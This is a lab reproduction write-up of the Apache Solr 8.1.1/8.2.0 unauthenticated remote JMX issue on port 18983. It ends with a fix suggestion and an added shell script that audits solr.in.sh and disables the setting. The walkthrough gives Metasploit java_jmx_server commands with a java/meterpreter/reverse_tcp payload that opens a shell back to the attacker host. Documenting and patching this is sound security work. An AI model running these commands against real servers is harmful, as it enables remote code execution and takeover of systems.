


0x00 Introduction
Solr is a standalone enterprise search server that exposes a web-service-style API. Users can submit XML files in a specific format to the server over HTTP to build indexes, and can issue search requests with HTTP GET and receive the results in XML format.
This vulnerability stems from the ENABLE_REMOTE_JMX_OPTS configuration option in the default configuration file solr.in.sh.
The built-in solr.in.sh shipped with Apache Solr 8.1.1 and 8.2.0 contains the setting ENABLE_REMOTE_JMX_OPTS="true".
If you use the default solr.in.sh file from an affected version, JMX monitoring is enabled and exposed on RMI_PORT (default = 18983) without any authentication. If this port is open for inbound traffic in the firewall, anyone with network access to the Solr node can access JMX and upload malicious code to be executed on the Solr server. This vulnerability does not affect users of Windows systems, but only affects users of some versions of Linux.
0x01 Affected versions
Apache Solr 8.1.1, released 2019-05-28
Apache Solr 8.2.0, released 2019-07-25
0x02 Vulnerability impact
If the victim uses this default configuration, the JMX service will be opened on the default port 18983, and authentication will not be enabled by default. Any attacker with access to this port could exploit this vulnerability to launch an attack on the affected service and execute arbitrary code.
0x03 Environment setup
A Java environment, a Kali system, and Solr 8.2.0
Solr 8.2.0 download address:
wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip
Attacking machine: Kali, IP: 192.168.10.147
Victim machine: Docker in Ubuntu18.6, IP: 192.168.10.184:8983
1. Use nmap to scan the ports and find that port 18983 is open
2. Use the exploit/multi/misc/java_jmx_server module in Metasploit to reproduce the vulnerability
    use exploit/multi/misc/java_jmx_server
    set RHOST 192.168.10.184
    set RPORT 18983
Set the payload: java/meterpreter/reverse_tcp
    set payload java/meterpreter/reverse_tcp
    set LHOST 192.168.10.147
    set LPORT 4444
3. Use run to execute, and you will see the connection successfully established
0x05 Fix suggestion
Set the ENABLE_REMOTE_JMX_OPTS option in the solr.in.sh configuration file to false and restart the Solr server.
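One way to check a node's solr.in.sh for the setting described above and apply the fix, as an added example that is not from the original article or the Solr project. The function names and the sample file contents are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original article): audit and fix solr.in.sh.

# Print the effective (last active, uncommented) value of variable $1 in file $2.
effective_value() {
    sed -n "s/^[[:space:]]*$1=//p" "$2" | tail -n 1 |
        sed 's/[[:space:]]*#.*$//' | tr -d "\"'"
}

# Print "EXPOSED <port>" and return 1 if remote JMX is on, else "OK" and return 0.
audit_solr_jmx() {
    jmx=$(effective_value ENABLE_REMOTE_JMX_OPTS "$1")
    port=$(effective_value RMI_PORT "$1")
    if [ "$jmx" = "true" ]; then
        echo "EXPOSED ${port:-18983}"   # 18983: default RMI_PORT per the article
        return 1
    fi
    echo "OK"
}

# Apply the article's fix in place, keeping the original as <file>.bak.
harden_solr_jmx() {
    cp "$1" "$1.bak" &&
        sed 's/^\([[:space:]]*\)ENABLE_REMOTE_JMX_OPTS=.*/\1ENABLE_REMOTE_JMX_OPTS="false"/' \
            "$1.bak" > "$1"
}

# Constructed sample mimicking the affected default file (not a verbatim copy).
write_sample() {
    cat > "$1" <<'EOF'
# Constructed sample solr.in.sh
#ENABLE_REMOTE_JMX_OPTS="false"
ENABLE_REMOTE_JMX_OPTS="true"
#RMI_PORT=18983
SOLR_HEAP="512m"
EOF
}

# Demo: audit the sample, harden it, audit again.
sample=$(mktemp)
write_sample "$sample"
echo "before: $(audit_solr_jmx "$sample" || true)"
harden_solr_jmx "$sample"
echo "after:  $(audit_solr_jmx "$sample")"
rm -f "$sample" "$sample.bak"
```

The audit only reads the file; the running process keeps its old JMX settings until Solr is restarted, as the fix suggestion states.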
